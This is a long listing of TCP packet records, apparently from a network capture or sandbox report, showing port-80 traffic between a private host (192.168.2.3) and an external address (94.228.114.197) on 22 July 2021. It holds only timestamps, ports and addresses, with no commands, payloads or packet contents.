Jul 22, 2021 11:28:01.056622028 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056632042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056669950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056683064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056716919 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056759119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056771994 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056796074 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056834936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056843042 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056874037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056910038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056921005 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056950092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056988001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056993008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.057034016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.057075977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.057101011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.057113886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.057214022 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.132775068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.132824898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.132961035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.133882046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.133924007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134017944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.134020090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134067059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134130955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.134135962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134175062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134231091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.134238958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134277105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134330034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.134341955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134380102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.134438038 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.136667013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.136709929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.136775970 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.137676001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137717962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137758017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137794971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137809992 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.137833118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137856007 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.137871027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137917042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137924910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.137959957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.137996912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138014078 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138035059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138073921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138086081 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138109922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138148069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138163090 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138185978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138233900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138242960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138276100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138345003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138350010 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138452053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138506889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138520956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138556004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138611078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138613939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138662100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138709068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138717890 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138758898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138808966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138822079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138855934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138905048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.138910055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.138953924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139007092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139008999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.139065027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139120102 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.139111996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139197111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139254093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.139254093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139307976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.139370918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.211973906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212006092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212018013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212029934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212042093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212054968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212066889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212079048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212090969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212102890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212115049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212131023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212142944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212158918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212168932 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212173939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212189913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212204933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212213039 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212220907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212223053 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212232113 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212239981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212256908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212272882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212287903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212302923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212317944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212333918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212348938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212367058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212383986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212383032 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212399006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212414980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212430954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212436914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212445974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212460995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212474108 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212476015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212482929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212495089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212512016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212517977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212527037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212542057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212557077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212568045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212572098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212574959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212579012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212588072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212601900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212601900 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212609053 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212620974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212613106 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212636948 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212651968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212666988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212682009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212690115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212697029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212697983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212713003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212727070 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212727070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.212753057 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212774992 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.212780952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213510036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213527918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213542938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213557005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213572025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213587999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213606119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213623047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213638067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213653088 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213668108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213685036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213694096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213705063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213706970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213713884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213721037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213722944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213740110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213815928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213824034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213835955 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213932991 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.213946104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213960886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213977098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.213993073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.214010000 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.214046001 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.214330912 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.215405941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.215423107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.215439081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.215454102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.215500116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.215531111 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.215641022 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.217381001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217398882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217411041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217427015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217442036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217459917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217477083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217482090 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.217493057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.217509031 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.217561960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218014956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218031883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218048096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218061924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218079090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218091011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218102932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218116045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218117952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218139887 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218173981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218209982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218226910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218241930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218260050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218277931 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218281031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218296051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218313932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218319893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218328953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218342066 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218346119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218363047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218379021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218389034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218390942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218408108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218419075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218430996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218446016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218450069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218457937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218461037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218473911 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218473911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218487024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218502045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218521118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218523026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218540907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218556881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218568087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218569040 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218584061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218595982 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218602896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218612909 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218620062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218636036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218652010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218657017 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218663931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.218708038 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218719006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.218925953 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291606903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291640997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291660070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291676044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291697025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291718006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291738987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291744947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291759968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291780949 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291791916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291798115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291819096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291827917 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291841030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291857958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291873932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291874886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291897058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291902065 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291939974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.291950941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.291977882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292007923 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292020082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292042017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292062998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292072058 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292085886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292104006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292120934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292138100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292180061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292188883 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292201996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292223930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292246103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292269945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292303085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292308092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292331934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292354107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292371035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292393923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292416096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292438984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292440891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292463064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292470932 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292501926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292503119 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292527914 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292536974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292550087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292571068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292592049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292613983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292615891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292624950 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292630911 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292634964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292635918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292655945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292678118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292706966 CEST	80	49720	94.228.114.197	192.168.2.3
